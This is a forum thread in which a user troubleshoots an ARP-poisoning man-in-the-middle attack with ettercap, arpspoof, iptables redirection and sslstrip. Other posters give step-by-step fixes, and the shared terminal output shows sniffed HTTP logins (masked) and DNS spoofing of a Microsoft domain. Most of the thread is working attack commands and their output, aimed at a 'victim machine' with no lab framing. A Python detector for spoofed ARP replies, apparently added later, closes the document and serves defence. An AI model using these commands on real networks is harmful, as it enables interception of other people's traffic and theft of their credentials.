Thread: Ettercap not detecting hosts

  1. #1
    Junior Member
    Join Date
    Aug 2009
    Posts
    27

    Default Ettercap not detecting hosts

    I'm having trouble with ettercap: when it scans for hosts it detects the router but not me (connected via wifi), so I can't ARP poison. Does anyone know what to do here?

  2. #2
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Is your wi-fi connected machine actually on the same subnet?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  3. #3
    Junior Member
    Join Date
    Aug 2009
    Posts
    27

    Default Yes

    Yes they are on the same subnet, if I run via terminal with:
    sudo ettercap -T --iface ra0 -q -M arp:remote /192.168.0.1/ // ***(192.168.0.1 is router)

    then it will scan and add the router to the hosts list, and not detect my IP (192.168.0.3) but I have noticed if I use links (terminal browser) and log in to the router I get this:

    HTTP : 192.168.0.1:80 -> USER: <MYUSER> PASS: <MYPASS> INFO: (null)

    I don't get any output if I try SSL logins, and I don't get any output whatsoever from Firefox.

  4. #4
    Junior Member
    Join Date
    May 2009
    Posts
    61

    Default

    Ettercap doesn't show your IP, but if you ARP poison all hosts on the subnet you can also see your surfing.

    And if you are new to ettercap, why don't you try ettercap with the graphical interface? This will be much easier if you are new to this program.

    I prefer ettercap options from the terminal if I must combine the program with other tools, so I don't need to have many open windows.

    Also, for SSL you must uncomment lines in etter.conf and combine the attack with sslstrip (nice little tool).

    Look here for a nice video from g0tmi1k about an attack to sniff SSL connections: http://forums.remote-exploit.org/bac...slstrip-3.html

  5. #5
    Junior Member
    Join Date
    Aug 2009
    Posts
    27

    Default

    Quote Originally Posted by Handsome-geek View Post
    Ettercap doesn't show your IP, but if you ARP poison all hosts on the subnet you can also see your surfing.
    I thought this may have been the case, that's why I poisoned all.

    Quote Originally Posted by Handsome-geek View Post
    I prefer ettercap options from the terminal if I must combine the program with other tools, so I don't need to have many open windows.
    Same here...

    Quote Originally Posted by Handsome-geek View Post
    Also, for SSL you must uncomment lines in etter.conf and combine the attack with sslstrip (nice little tool).

    Look here for a nice video from g0tmi1k about an attack to sniff SSL connections:
    I have already set up etter.conf and am combining with sslstrip. The parts I have changed in etter.conf are:

    ec_uid = 0
    ec_gid = 0

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


    arpspoof redirects traffic to my MAC but only if I do not specify myself as the target. If I do I get "arpspoof: couldn't arp for host 192.168.0.3"

    This is the iptables command I am running:

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    I run sslstrip

    I get NOTHING. Totally stumped

  6. #6
    Junior Member
    Join Date
    May 2009
    Posts
    61

    Default

    Insert this before the PREROUTING iptables rule and tell me the results: echo 1 > /proc/sys/net/ipv4/ip_forward

    And when you ARP spoof, the first target is the IP you are attacking and the second target is your gateway; try this attack with specified targets.

    ARP spoofing all hosts on the gateway is good if you have 4 or more hosts on the network; try first with a specified target.

    Tell me the results after you try. After you set IP forwarding and prerouting, then start sslstrip.

    If the page you are visiting on the victim machine has http and is a login page that normally has https, then your attack is doing fine.

  7. #7
    Junior Member
    Join Date
    Aug 2009
    Posts
    27

    Default

    Quote Originally Posted by Handsome-geek View Post
    Insert this before the PREROUTING iptables rule and tell me the results: echo 1 > /proc/sys/net/ipv4/ip_forward

    And when you ARP spoof, the first target is the IP you are attacking and the second target is your gateway; try this attack with specified targets.

    ARP spoofing all hosts on the gateway is good if you have 4 or more hosts on the network; try first with a specified target.

    Tell me the results after you try. After you set IP forwarding and prerouting, then start sslstrip.

    If the page you are visiting on the victim machine has http and is a login page that normally has https, then your attack is doing fine.
    Tried this now on Ubuntu and BackTrack 4.

    root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
    root@bt:~#

    root@bt:~# arpspoof -i ra0 -t 192.168.0.2 192.168.0.1

    arpspoof: couldn't arp for host 192.168.0.2
    root@bt:~# (192.168.0.2 is now my attacking machine as it's the only one available at the moment)

    root@bt:~# arpspoof -i ra0 192.168.0.1
    0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
    0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
    0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
    0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
    etc....

    root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    root@bt:~#

    root@bt:~# sslstrip -a -f -k

    Ettercap > Unified sniffing > scan hosts > 192.168.0.1 - target 2 > mitm >arp >sniff remote > start

    Listening on ra0... (Ethernet)

    ra0 -> 00:22:75:3B:E3:98 192.168.0.2 255.255.255.0

    Privileges dropped to UID 65534 GID 65534...

    28 plugins
    39 protocol dissectors
    53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    1 hosts added to the hosts list...
    Host 192.168.0.1 added to TARGET2

    ARP poisoning victims:

    GROUP 1 : ANY (all the hosts in the list)

    GROUP 2 : 192.168.0.1 00:22:75:3B:E3:98
    Starting Unified sniffing...

    HTTP : 208.101.8.53:80 -> USER: ****** PASS: **** INFO: <A forum address>

    HTTP : 192.168.0.1:80 -> USER: ***** PASS: ***** INFO: 192.168.0.1
    HTTP : 67.15.24.40:80 -> USER: **** PASS: ***** INFO: <a forum address>
    Activating chk_poison plugin...
    chk_poison: Checking poisoning status...
    chk_poison: No poisoning at all

    I just realized I set it up for dns spoofing, which is working.
    Activating dns_spoof plugin...
    dns_spoof: wwwdot-microsoft-dotcom spoofed to [198.182.196.56]
    Unified sniffing was stopped.



    Host 192.168.0.1 added to TARGET1


    I stopped the sniff and put the router in target 1:

    no SSL but HTML logins as above
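
For defenders, the repeated broadcast ARP replies in the arpspoof output above are the observable to alert on. The following is an added example, not part of the original thread: a small parser for lines in that format that flags replies contradicting a known IP-to-MAC baseline or repeating as broadcasts. The baseline gateway MAC, the function names and the repeat threshold are assumptions made for illustration.

```python
import re
from collections import Counter

# Matches the dsniff/arpspoof-style line shown in the thread:
# <src mac> <dst mac> 0806 <len>: arp reply <ip> is-at <mac>
LINE_RE = re.compile(
    r"^\s*(?P<src>[0-9a-fA-F:]+)\s+(?P<dst>[0-9a-fA-F:]+)\s+0806\s+\d+:\s+"
    r"arp reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at (?P<mac>[0-9a-fA-F:]+)\s*$"
)

def norm_mac(mac):
    """Zero-pad each octet and lowercase, so 0:22:75 equals 00:22:75."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))

def find_arp_anomalies(lines, baseline, repeat_threshold=3):
    """Return sorted (kind, ip, mac) findings for ARP replies that
    contradict the known IP->MAC baseline or repeat as broadcasts."""
    findings = set()
    broadcast_replies = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # prompts, blank lines, other output
        ip, mac = m["ip"], norm_mac(m["mac"])
        known = baseline.get(ip)
        if known and norm_mac(known) != mac:
            findings.add(("binding_conflict", ip, mac))
        if norm_mac(m["dst"]) == "ff:ff:ff:ff:ff:ff":
            broadcast_replies[(ip, mac)] += 1
    for (ip, mac), count in broadcast_replies.items():
        if count >= repeat_threshold:
            findings.add(("repeated_broadcast_reply", ip, mac))
    return sorted(findings)

# Constructed sample: reply lines in the format from the thread plus one
# benign unicast reply. The baseline gateway MAC is a made-up value.
BASELINE = {"192.168.0.1": "00:11:22:33:44:55"}
SPOOFED = "0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98"
SAMPLE = [
    "root@bt:~# arpspoof -i ra0 192.168.0.1",
    SPOOFED, SPOOFED, SPOOFED, SPOOFED,
    "00:11:22:33:44:55 0:22:75:3b:e3:98 0806 42: arp reply 192.168.0.1 is-at 00:11:22:33:44:55",
]

if __name__ == "__main__":
    for finding in find_arp_anomalies(SAMPLE, BASELINE):
        print(finding)
```

A single broadcast reply can be a legitimate gratuitous ARP (for example after a failover), which is why the repeat check uses a threshold while a baseline conflict is reported on first sight.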
